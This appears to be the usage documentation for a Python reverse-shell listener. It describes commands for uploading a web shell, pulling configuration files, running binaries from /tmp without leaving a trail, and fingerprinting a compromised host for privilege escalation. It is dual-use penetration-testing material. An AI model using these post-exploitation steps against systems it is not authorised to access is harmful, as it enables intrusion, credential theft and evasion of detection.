The reverse shell client is a Python based alternative for a netcat reverse shell listener (
nc -lvp <port>).
The default reverse shell client (
rsh-client.py) ships with lots of features such as uploading, downloading, executing and editing files on the (unix based) remote host you managed to get a shell on.
You can also download the standalone version (
rsh-client-standalone.py), which is simply a smaller version without the custom commands, mostly useful for local privelege escalation when wanting to get a shell as another process when netcat is not available on the system.
Using the reverse shell client is simple, simply execute the script via the command line without any parameters. This will make your shell listen on any interface address on your system for an inbound connection from a randomly selected port.
Viewing the help section
You can view the help page by executing the script with the
python rsh-client.py --help
Listen on a specific port
You can specify what port to listen on with the
--port <int> or
-p <int> argument. This could be useful if your're behind a firewall and you have a specific port forwarded to you. It is recommended that you always use this argument to prevent errors when trying to create a reverse shell.
python rsh-client.py --port 1337
Listen on a specific interface address
You can specify what interface address to listen on by executing the script with the
--interface <string> or
-i <string> argument. This could be to limit the inbound connections to only a specific interface such as
127.0.0.1. By default the script listens on any interface address.
python rsh-client.py --interface 127.0.0.1
Setting an inbound connections whitelist
You can specify a whitelist to accept connections from by using the
-A <string> or
--accept <string> argument. This is to limit the inbound connections to the script as it only supports one connection at a time, however support for multiple connections might be added in the future.
python rsh-client.py --accept "127.0.0.1,192.168.0.21"
Persistent mode prevents you from losing your shell when pressing
^C (CTRL + C), as this normally stops any python script. This can be done by using the
You can still exit your shell by using the command
rsh exit or by pressing
^Z (CTRL + Z), however using
^Z is not advised as it might keep the connection alive or prevent python from closing the current port you were listening on. If however you don't have any other choice but to
^Z your script, use the following bash command to kill all processes listening on the port you just used for the reverse shell client:
kill -9 $(lsof -ti :<port>)
python rsh-client.py --persistent
Debug mode is an experimental option mainly used to test features during development, this is why it is not listed when using viewing the help section. It can be enabled by using the
--debug argument. It is not advised to use this option unless you're modifying the script, or if your connection does not send any data back.
python rsh-client.py --debug
The RSH shell
The RSH shell is activated once the script receives an inbound conenction. The command
rsh .. is used to access special features such as uploading and downloading. However, if you wish to send the command itself to the remote host, you can use a backslash like so
\rsh ... to prevent the command from being interpereted as a local method. This is the same for
nano -> \nano or
vim -> \vim as these can cause your shell to freeze or disconnect. (The
rsh command is used on some linux distributions as a synonym for the
Exiting the shell
Exits the current shell by closing the socket. By default,
rsh exit is executed when
^C (CTRL + C) is pressed. This feature can be disabled by using the
--persistent argument when running the script.
Uploading file to the remote host is done by reading the local file, and echoing the contents in blocks of 1024 bytes into the remote file. This is done like so:
/bin/echo -en '\x08\x03\x00..' >> /remote/file. The script first checks if the shell has permission to write to the specified location and shows a prompt to upload to
/tmp/.. instead if permission is denied. If no remote file is specified it will try to echo the file in the current working directory and if the file already exists, your shell will be prompted to overwrite the remote file.
rsh upload <localfile> [<remotefile>]
rsh upload /root/shell.php /home/www/evil.php
Downloading a file from the remote host is done by checking if the remote file is readable and then using the
cat <remotefile> command to get the contents which are then outputted into a file on your local system.
rsh download <remotefile> [<localfile>]
rsh download /home/www/config.php /tmp/config.php
Executing files or scripts
Executing files is done by automatically uploading a file to the remote host in the
/tmp/.. directory, executing it and then removing it so it doesn't leave a trail. Parameters will be added to the file execution. See
rsh help upload and
rsh help download for more information about file transfers.
rsh execute <localfile> [<params>]
rsh execute /root/somebinary -abc
Editing files on the remote host
vim have the tendency to break your shell, the
rsh edit command downloads the file to your local machine, opens your default editor and then re-uploads the file to the remote host to prevent this. The script will first detect if the file has rights to read and write the files. If the local file after editing has not changed, no file will be re-uploaded. You can use the
--force parameter to force the script to re-upload the file.
rsh edit <remotefile> [-f | --force]
rsh edit /home/www/index.php -f
Fingerprinting the remote host
The fingerprinting command is simply a useful utility to find out more about the system and find possible ways to escalate local priveleges.
Summary: No release message
By downloading software from this website the person in question agrees that they will use any
of software in question in an ethical (non-malicious) way and agrees that the developer(s) are NOT
held responsible for any damage caused by the use and or abuse of this software.
Misuse of any software from this website may result in criminal charges brought against the person in question depending on the country or state of residence which can result in probation, fines up to $100000 or prison sentences up to 20 years in federal prison.
Please think twice before you run a script if you don't know what you're doing.